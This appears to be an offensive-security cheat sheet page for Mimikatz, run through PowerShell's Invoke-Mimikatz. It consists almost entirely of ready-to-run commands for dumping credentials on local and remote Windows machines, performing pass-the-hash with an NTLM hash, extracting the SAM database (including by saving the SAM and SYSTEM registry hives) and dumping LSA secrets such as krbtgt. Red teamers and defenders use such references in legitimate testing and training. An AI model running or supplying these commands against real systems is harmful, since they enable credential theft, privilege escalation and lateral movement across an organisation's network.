Invoke-MimiKatz
Mimikatz dump credentials on local machine
Invoke-Mimikatz -Dumpcreds
Mimikatz dump credentials on multiple remote machines
Invoke-Mimikatz -Dumpcreds -Computername @(“<system1>”,”<system2>”)
Invoke-Mimikatz -Dumpcreds -ComputerName @("<computername 1>","<computername 2>")
Mimikatz start powershell pass the hash (run as local admin)
Invoke-Mimikatz -Command '"sekurlsa::pth /user:<username> /domain:<domain> /ntlm:<ntlm hash> /run:powershell.exe"'
Mimikatz dump from SAM
Invoke-Mimikatz -Command '"privilege::debug" "token::elevate" "lsadump::sam"'
or
reg save HKLM\SAM SamBkup.hiv
reg save HKLM\System SystemBkup.hiv
#Start mimikatz as administrator
privilege::debug
token::elevate
lsadump::sam SamBkup.hiv SystemBkup.hiv
Mimikatz dump lsa (krbtgt to)
Invoke-Mimikatz -Command '"lsadump::lsa /patch"' -Computername <computername>
Last updated
Was this helpful?